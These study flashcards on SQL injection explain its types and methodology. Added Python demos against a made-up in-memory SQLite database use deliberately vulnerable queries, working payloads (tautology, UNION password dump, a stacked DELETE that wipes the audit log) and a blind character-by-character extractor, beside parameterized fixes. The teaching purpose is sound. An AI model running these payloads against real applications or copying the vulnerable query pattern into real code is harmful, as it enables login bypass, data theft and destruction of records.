15 - SQL Injection Flashcards
What is SQL Injection?
A technique that takes advantage of unsanitized input to pass SQL commands through a web app for execution by the backend database. The root cause is an application that builds a query by concatenating user input into the SQL string instead of binding it as a parameter. It is used either to gain unauthorized access or to retrieve information directly from the DB.
What kind of attacks can SQL injection be used to implement?
- Authentication Bypass: An attacker logs into the app without valid credentials and may gain admin privileges.
- Information Disclosure: An attacker obtains sensitive information stored in the database.
- Compromised Data Integrity: An attacker uses the injection to deface a web page, insert data, or alter the contents of the database.
- Compromised Availability of Data: An attacker deletes database contents, or the logs and audit information kept in the database, destroying evidence as well as data.
- Remote Code Execution: Helps an attacker compromise the host OS, for example through DBMS features that execute OS commands or write files to disk.
What type of databases are susceptible to SQL-Injection attacks?
Relational (SQL) databases: any application that builds SQL from untrusted input against MySQL, MSSQL, Oracle, PostgreSQL, SQLite, etc. NoSQL stores have analogous injection problems, but those are not SQL injection.
What is an HTTP Post request?
A POST request carries the submitted data in the message body rather than in the URL. The string sent to the web server is visible in the body of the HTTP or HTTPS POST request, so it is just as attacker-controlled as a GET parameter; keeping a field out of the URL (or marking it hidden) does not protect it.
What is a SQL query?
A SQL command that is constructed to interact with a backend SQL database.
How does a SQL injection query exploit the normal execution of SQL?
The application builds the query by concatenating the request's input into the SQL text without filtering or parameterizing it. Input containing SQL metacharacters (quotes, comment markers, operators, statement terminators) therefore changes the structure of the statement, and the database executes the attacker's syntax as part of the intended query.
What are the main types of SQL Injection?
- In-Band SQL Injection: The attacker uses the same communication channel to perform the attack and retrieve the results (query output or error text comes back in the HTTP response).
- Blind/Inferential SQL Injection: Used when the app returns neither SQL error messages nor query output. The attacker sends queries whose injected condition is true or false and infers the answer from a side effect: a difference in page content (boolean-based) or in response time (time-based). Data is extracted one bit or character at a time.
- Out-of-Band SQL Injection: The attacker uses a different communication channel to perform the attack and obtain the result, e.g. making the database server issue a DNS or HTTP request that carries the data to an attacker-controlled host.
What are the types of In-Band SQL Injection?
- Error-Based SQL Injection: Attackers intentionally send bad data to the app in order to receive database errors, and read data out of the error text.
- System Stored Procedure: The DBMS's built-in stored procedures are abused (e.g. to run OS commands or read files).
- Illegal/Logically Incorrect Query: Attackers send syntactically or logically invalid queries so the database error reveals the DBMS type, table or column names, or query structure.
- Union SQL Injection: Attackers use a UNION clause to join a forged SELECT to the original query; the forged SELECT must return the same number of columns as the original.
- Tautology: Attackers inject a condition that is always true, so the WHERE clause matches every row (e.g. ' OR '1'='1).
- End of Line Comment: After injecting code into a field, the rest of the legitimate query is nullified with an end-of-line comment ("--" on most DBMSs, "#" also on MySQL).
- Inline Comment: Attackers use inline comments ("/* */") to evade filters or to join input from multiple vulnerable fields into a single query.
- Piggybacked Query: Attackers append an additional malicious statement to the original query after a statement terminator (";"); this only works when the app's database driver executes stacked statements.
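The following is an added example, not part of the original flashcards, showing how a concatenated query hands control of the SQL to the caller (the question "How does a SQL injection query exploit the normal execution of SQL?" above) and demonstrating the in-band techniques just listed: tautology, end-of-line comment, UNION, error-based and piggybacked, beside the parameterized form that defeats them. It assumes Python's built-in sqlite3 module with a constructed in-memory database; the table names, rows and function names are made up for the demo.

```python
import sqlite3

# Constructed sample data: an in-memory application database for the demo.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
INSERT INTO users VALUES (1, 'admin', 'S3cret!', 'admin');
INSERT INTO users VALUES (2, 'alice', 'wonderland', 'user');
CREATE TABLE audit_log(id INTEGER PRIMARY KEY, msg TEXT);
INSERT INTO audit_log VALUES (1, 'login ok: alice');
""")


def vulnerable_login(username, password):
    """Deliberately vulnerable: input is concatenated into the SQL text, so the
    database parses attacker-supplied characters as SQL syntax."""
    sql = ("SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def safe_login(username, password):
    """Hardened form: a parameterized query binds the input as data; it can
    never change the structure of the statement."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def vulnerable_log_search(term):
    """Second vulnerable endpoint that runs its SQL as a multi-statement script
    (executescript), which is what makes a piggybacked query possible."""
    conn.executescript(f"SELECT msg FROM audit_log WHERE msg LIKE '%{term}%';")


def audit_rows():
    return conn.execute("SELECT count(*) FROM audit_log").fetchone()[0]


def tautology():
    # ' OR '1'='1 makes the WHERE clause always true, so every user is returned.
    return vulnerable_login("x' OR '1'='1", "x' OR '1'='1")


def end_of_line_comment():
    # admin'-- closes the string and comments out the password check.
    return vulnerable_login("admin'-- ", "wrong")


def union_injection():
    # UNION appends a forged SELECT; its column count (2) must match the original.
    return sorted(vulnerable_login("x' UNION SELECT username, password FROM users-- ", ""))


def error_based():
    # Illegal/logically incorrect query: an unbalanced quote makes the DBMS
    # raise an error that a verbose app would leak back to the client.
    try:
        vulnerable_login("'", "")
    except sqlite3.Error as e:
        return str(e)
    return None


def piggybacked():
    # Stacked query: terminate the original statement and append a destructive one.
    before = audit_rows()
    vulnerable_log_search("'; DELETE FROM audit_log; -- ")
    return before, audit_rows()


if __name__ == "__main__":
    print("tautology      :", tautology())
    print("eol comment    :", end_of_line_comment())
    print("union          :", union_injection())
    print("error text     :", error_based())
    print("safe login     :", safe_login("admin'-- ", "wrong"))
    print("audit rows     :", piggybacked())
```

Note that sqlite3's plain execute() refuses stacked statements, which is why the piggybacked case needs a second endpoint built on executescript(); drivers for other DBMSs differ in whether they allow stacking, so the piggybacked technique is driver-dependent while the others are not.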
What is a Time-based SQL injection?
A way for attackers to learn whether an injected True/False condition is True when the app returns only a generic error or identical pages either way. The injected query calls a delay function (SLEEP() on MySQL, WAITFOR DELAY on MSSQL, pg_sleep() on PostgreSQL) only when the condition is true, so the response time reveals the answer and data can be extracted bit by bit.
What is Boolean Exploitation?
Where an attacker sends a series of injected True/False conditions (including some they already know to be true or false, as a baseline) and compares the responses; a page that differs between the true and false cases acts as a yes/no oracle for each condition.
What is a Heavy Query?
A query that retrieves a huge amount of data and therefore takes a long time to execute, typically built from multiple joins (e.g. a cross join of a large table with itself). It is a form of time-based attack used when no delay function is available: the heavy query is run only when the injected condition is true, so the slow response reveals the answer.
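An added example (not from the original flashcards) of the blind techniques described in the last three cards: a target that returns only "found / not found", a boolean oracle built on that difference, a time-based oracle for the case where the page is identical either way, and a character-by-character extractor that drives either oracle. It assumes Python's sqlite3 with constructed data; because SQLite has no SLEEP(), a Python user-defined function named sleep is registered as a stand-in for the DBMS delay functions. Table, column and function names are invented for the demo.

```python
import sqlite3
import time

# Constructed sample data: the secret we will recover without ever seeing it.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'hunter2');
""")
# SQLite has no SLEEP(); this user-defined function stands in for MySQL's
# SLEEP() / MSSQL's WAITFOR DELAY so the time-based technique can be shown.
conn.create_function("sleep", 1, lambda secs: time.sleep(secs) or 0)


def profile_exists(user_id):
    """Deliberately vulnerable endpoint. Like a real blind target it returns only
    whether a profile was found: no rows, no column values, no error text."""
    sql = f"SELECT id FROM users WHERE id = {user_id}"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def boolean_oracle(condition):
    # Boolean-based: the page behaves differently (found / not found)
    # depending on whether the injected condition is true.
    return profile_exists(f"1 AND ({condition})")


def time_oracle(condition, delay=0.2):
    # Time-based: the page looks identical either way (both CASE branches
    # evaluate to 0), so only the response time reveals the truth value.
    start = time.monotonic()
    profile_exists(f"1 AND (CASE WHEN ({condition}) THEN sleep({delay}) ELSE 0 END) = 0")
    return time.monotonic() - start >= delay * 0.9


def extract(oracle, column, table, row_filter="id = 1", max_len=32):
    """Recover a string one character at a time through a yes/no oracle, using a
    binary search over printable ASCII (about 7 queries per character)."""
    value = f"(SELECT {column} FROM {table} WHERE {row_filter})"
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length({value}) >= {pos}"):
            break  # reached the end of the string
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({value}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    print("boolean-based:", extract(boolean_oracle, "password", "users"))
    print("time-based   :", time_oracle("1=1"), time_oracle("1=2"))
```

The same extract() routine works with time_oracle in place of boolean_oracle, just far more slowly (each query costs the delay when the answer is yes), which is why attackers prefer boolean inference whenever the page gives them any observable difference and fall back to timing, or to a heavy query, only when it does not.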
What are the steps of the SQL Injection Methodology?
- Information Gathering and SQL Injection Vulnerability Detection
- Launch SQL Injection Attacks
- Advanced SQL Injection
What type of steps are taken in the SQL Injection Info Gathering stage?
Check whether the web app connects to a DB server; list all input fields, hidden fields, and POST parameters. Attempt to inject characters such as a single quote to generate errors and evaluate the information in the error messages (DBMS type, query fragments, column names). Put a string in a numeric field and vice versa, and use the UNION operator to combine the result set of two or more SELECT statements, first finding the column count the original query returns.
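The information-gathering steps above, carried out as an added example (not part of the original flashcards) against a constructed lookup-by-id page: a single quote, a string in a numeric field, an arithmetic probe, column counting with ORDER BY, and a UNION of NULLs to confirm the count. The same probe run against a hardened endpoint shows what a negative result looks like. It assumes Python's sqlite3; the table, rows and function names are made up for the demo.

```python
import sqlite3

# Constructed sample data: a product catalogue behind a lookup-by-id page.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL);
INSERT INTO products VALUES (1, 'widget', 9.99);
INSERT INTO products VALUES (2, 'gadget', 19.99);
""")


def vulnerable_product_page(product_id):
    """Deliberately vulnerable: the id parameter is dropped straight into the
    query. Returns (rows, error_text), as a verbose app would."""
    sql = f"SELECT id, name, price FROM products WHERE id = {product_id}"
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.Error as e:
        return [], str(e)


def safe_product_page(product_id):
    """Hardened: type-check the input and bind it as a parameter. Bad input
    gets an empty result (think HTTP 404), never a database error."""
    try:
        pid = int(product_id)
    except ValueError:
        return [], None
    rows = conn.execute("SELECT id, name, price FROM products WHERE id = ?", (pid,)).fetchall()
    return rows, None


def probe(endpoint, max_columns=20):
    """Information-gathering steps from the flashcard, run against one endpoint."""
    report = {}
    baseline, _ = endpoint("1")
    # 1. Single quote: does a DB error surface in the response?
    _, err = endpoint("1'")
    report["quote_error"] = err
    # 2. String in a numeric field.
    _, err = endpoint("1abc")
    report["string_in_number_error"] = err
    # 3. Arithmetic: if '2-1' returns the same page as '1', the DB evaluated it.
    rows, _ = endpoint("2-1")
    report["arithmetic_evaluated"] = rows == baseline and len(baseline) > 0
    # 4. Count columns: ORDER BY n errors once n exceeds the SELECT's width.
    report["column_count"] = None
    for n in range(1, max_columns + 1):
        _, err = endpoint(f"1 ORDER BY {n}")
        if err:
            report["column_count"] = n - 1
            break
    # 5. Confirm with a UNION of NULLs; a working UNION adds exactly one row.
    if report["column_count"]:
        nulls = ", ".join(["NULL"] * report["column_count"])
        rows, err = endpoint(f"1 UNION SELECT {nulls}")
        report["union_works"] = err is None and len(rows) == len(baseline) + 1
    else:
        report["union_works"] = False
    return report


if __name__ == "__main__":
    print("vulnerable:", probe(vulnerable_product_page))
    print("hardened  :", probe(safe_product_page))
```

The arithmetic probe (step 3) is the one to remember: it needs no error message at all, so it still works against an app that hides database errors, and it is the same content-difference signal that blind, boolean-based extraction builds on.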